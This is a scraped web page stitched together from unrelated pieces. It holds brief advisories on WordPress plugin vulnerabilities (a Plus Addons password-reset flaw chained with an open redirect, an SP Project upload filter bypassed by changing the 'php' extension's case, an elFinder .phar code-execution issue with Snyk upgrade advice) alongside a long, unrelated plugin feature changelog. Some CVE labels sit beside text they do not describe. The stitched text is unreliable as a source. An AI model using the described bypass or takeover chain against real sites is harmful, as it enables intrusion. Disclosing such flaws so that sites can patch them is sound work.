The Plus Addons for Elementor Page Builder WordPress plugin before 4.1.11 did not properly check that a user requesting a password reset was the legitimate user, allowing an attacker to send an arbitrary reset password email to a registered user on behalf of the WordPress site. Such issue could be chained with an open redirect (CVE-2021-24358) in version below 4.1.10, to include a crafted password reset link in the email, which would lead to an account takeover.

Compatibility : WordPress 6.0  
Compatibility : Elementor Pro 3.7  
Added : Heading Title : Animated Split by Word

Added : Heading Title : Animated Split by Character

Added : Heading Title : Animated Split by Line

Added : Display Rules : Image Selector(Advanced Custom Fields: Extended)

Added : Display Rules : Visitor Location (IP Based - Based on Geoplugin )

Added : Display Rules : WordPress Site Language

Added : Display Rules : Visitor Browser Language

Added : Display Rules : String in URL (Exact match from URL value )

Added : Display Rules : Parameter in URL 

Added : Display Rules : Shortcode based visibility (Advanced Custom PHP function based Shortcode)

Added : Display Rules : Cart Product Category (WooCommerce)

Added : Display Rules : Category In Cart (WooCommerce)

Added : Display Rules : Cart Subtotal (WooCommerce)

Added : Display Rules : Cart Total (WooCommerce)

Added : Display Rules : Items in Cart (WooCommerce)

Added : Display Rules : Purchase Date (WooCommerce)

Added : Display Rules : In Purchase Product Category (WooCommerce)

Added : Display Rules : Order(s) Placed (WooCommerce)

Added : Display Rules : Current Product Category (WooCommerce)

Added : Display Rules : Current Product Price (WooCommerce)

Added : Display Rules : Current Product Stock (WooCommerce)

Added : Display Rules : Cart Product (WooCommerce)

Added : Display Rules : Text field (Toolset)

Added : Display Rules : Number field (Toolset)

Added : Display Rules : Radio field (Toolset)

Added : Display Rules : Checkbox field (Toolset)

Added : Display Rules : Checkboxes field (Toolset)

Added : Display Rules : Select field (Toolset)

Added : Display Rules : Text field (PODS)

Added : Display Rules : Date field (PODS)

Added : Display Rules : Number field (PODS)

Added : Display Rules : Boolean field (PODS)

Added : Display Rules : Text field (Jet Engine)

Added : Display Rules : Text Area field (Jet Engine)

Added : Display Rules : Switcher field (Jet Engine)

Added : Display Rules : Checkbox field (Jet Engine)

Added : Display Rules : Radio field (Jet Engine)

Added : Display Rules : Select field (Jet Engine)

Added : Display Rules : Number field (Jet Engine)

Added : Mouse Cursor : Container

Added : Unfold : Container

Added : Post Feature Image : Container

Update : Display Rules : Display Field Name with Group Label

Update : Dynamic Listing : Category Listout improvement

Update : Product Listing : Upsell Listing

Update : Product Listing : Cross-Sell Listing

Update : Accordion : Title Empty condition for Dynamic Value

Update : Accordion : Scroll Top Offset

Update : Tabs & Tours : Title Empty condition for Dynamic Value

Update : Scroll Navigation : Section Top Offset after click

Update : Post Meta : Taxonomies Type option (Category/Tag)

Update : Woo Single Basic : Next/Previous related to current Product Category

Update : Search bar : Search by Word Match

Update : Search bar : Related Search Tag

Update : Search Filter : Category show based on Archive page option

Update : Search Filter : Sorting value option for Tab, Radio, Checkbox and Dropdown

Update : Hotspot : Hover Pin Image with flip effect

Update : Audio Player : Loop Disable option

Update : LottieFiles Animation : JSON File Upload

Update : Dynamic Listing : Slide Animation option

Update : Infobox : Slide Animation option

Update : Gallery Listing : Slide Animation option

Update : Search bar : Animation option

Update : Number Counter : Dynamic Tag option for Number Value, Animation Starting Value and Gap

Update : Navigation Menu : Sticky support Container

Update : Navigation Menu : Accessibility

Update : Animated Service Boxes : Lottie Animations option

Update : Hotspot : Lottie Animations option

Update : Image Cascading : Lottie Animations option

Update : Number Counter : Lottie Animations option

Update : Popup Builder : Lottie Animations option

Update : Pricing List : Lottie Animations option

Update : Pricing Table : Lottie Animations option

Update : Process/Steps : Lottie Animations option

Update : Progress Bar : Lottie Animations option

Update : Unfold : Lottie Animations option

Update : Live Copy : Container Compatibility

Update : Plus Extras : Container Compatibility

Update : Display Rules : Container Compatibility

Update : Page Scroll : Container Compatibility

Update : Row Background : Container Compatibility

Update : Shape Divider : Container Compatibility

Update : Morphing Layouts : Container Compatibility

Update : Dynamic Smart Showcase : Container Compatibility

Update : Global Tilt Effect : Container Compatibility

Update : Carousel Slider : Container Compatibility

Update : Advanced Shadow : Container Compatibility

Update : Equal Height : Container Compatibility

Update : Glass Morphism : Container Compatibility

Update : Wrapper Link : Container Compatibility

Update : Animated Service Box : Container Compatibility

Update : Animated Service box Text (Stroke and Shadow)

Update : Animated Service box Height (EM,%,VH)

Update : Countdown : Label HTML Tag option (h1 - h6)

Update : Coupon Code : Title HTML Tag option (h1 - h6)

Update : Coupon Code : Content HTML Tag option (h1 - h6)

Update : Coupon Code : JS improvement for Copy button

Update : Woo MyAccount : No order Found Styling

Update : Woo MyAccount : Order tab Individual improvement

Update : Process Step : Margin option for Description

Update : Listing Widget : Post Excerpt empty value validation

Update : Infobox : Top margin option

Update : Social Feed : Instagram Business Account condition improvement

Update : Dynamic Listing : Author Prefix text dynamic

Update : Blog Listing : Author Prefix text dynamic

Fix : Google Map : HTML display bug with Filter

Fix : Table : Tooltip Field

Fix : Listing Widget : On Load more / Lazy load animation

Fix : Mouse Cursor : Column Cursor icon

Fix : LottieFiles Animation : Animation Play Speed

Fix : Countdown : Fake Number

Fix : Sticky Column

Fix : Design Tool : Background Visibility

Fix : Navigation Menu : CSS based effect bug on click

Fix : Slick Carousel : Draggable Disable bug on Mobile

CVE-2021-24359: Give feedback and suggest new ideas for The Plus Addons for Elementor. Powered by FeedBear.

The SP Project & Document Manager WordPress plugin before 4.22 allows users to upload files, however, the plugin attempts to prevent php and other similar files that could be executed on the server from being uploaded by checking the file extension. It was discovered that php files could still be uploaded by changing the file extension's case, for example, from "php" to "pHP".

CVE-2021-24347

The package studio-42/elfinder before 2.1.58 are vulnerable to Remote Code Execution (RCE) via execution of PHP code in a .phar file. NOTE: This only applies if the server parses .phar files as PHP.

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

*   Snyk ID **SNYK-PHP-STUDIO42ELFINDER-1290554**
*   published **13 Jun 2021**
*   disclosed **9 May 2021**
*   credit **Ashok Chand**

**How to fix?**

Upgrade studio-42/elfinder to version 2.1.58 or higher.

**Overview**

studio-42/elfinder is an open-source file manager for web, written in JavaScript using jQuery UI.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) via execution of PHP code in a .phar file. NOTE: This only applies if the server is configured to parse .phar files as PHP.

Tag

#php